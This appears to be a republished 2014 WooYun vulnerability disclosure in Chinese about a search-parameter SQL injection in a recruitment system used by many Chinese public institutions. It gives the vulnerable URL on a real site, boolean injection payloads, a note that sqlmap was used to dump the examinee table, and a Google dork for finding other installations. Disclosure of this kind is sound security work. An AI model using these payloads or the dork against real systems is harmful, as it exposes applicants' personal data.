记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华
«万户OA某处无限制sql注入...
爱康国宾一处越权可下载任意用户敏感信息... »

某通用型事业单位用人才系统存在搜索型SQL注入影响众多事业单位考试考生信息!!

2014-09-05 22:50

厂商:

厦门金才科技有限公司

WooYun: 某事业单位用人才系统存在任意文件下载漏洞和越权查看简历 之前有人提交过任意文件下载和越权漏洞



漏洞详情:

注入点:留言系统-->搜索处存在搜索型注入,参数Keyword

http://www.zzsyzp.com/sydwzk/refer/refer.jsp?AreaID=1&DeptType=1&PublicFlag=2&FrequentFlag=2&TypeID=0&Keyword=%25%27+and+1%3D1+and+%27%25%27%3D%27&goNo=&ShowCountNo=10&ShowCount=10&totalNO=1



Kyeword测试:

%' and 1=1 and '%'='



QQ20140607-2.png



>%' and 1=2 and '%'='



QQ20140607-1.png



基本确定存在注入了,sqlmap取数据看看:

QQ20140607-4.png



QQ20140607-5.png



QQ20140607-6.png



看看考生用户表:

QQ20140607-7.png



数据就不贴了,影响足够大。。



安装量及影响:

google: inurl:sydwzk/demand

QQ20140607-3.png



影响N多事业单位





漏洞证明:

注入点:留言系统-->搜索处存在搜索型注入,参数Keyword

http://www.zzsyzp.com/sydwzk/refer/refer.jsp?AreaID=1&DeptType=1&PublicFlag=2&FrequentFlag=2&TypeID=0&Keyword=%25%27+and+1%3D1+and+%27%25%27%3D%27&goNo=&ShowCountNo=10&ShowCount=10&totalNO=1



Kyeword测试:

%' and 1=1 and '%'='



QQ20140607-2.png



>%' and 1=2 and '%'='



QQ20140607-1.png



基本确定存在注入了,sqlmap取数据看看:

QQ20140607-4.png



QQ20140607-5.png



QQ20140607-6.png



看看考生用户表:

QQ20140607-7.png

修复方案:

做好过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-063939

阅读:146905 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“某通用型事业单位用人才系统存在搜索型SQL注入影响众多事业单位考试考生信息!!”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

推荐文章

标签云

本页关键词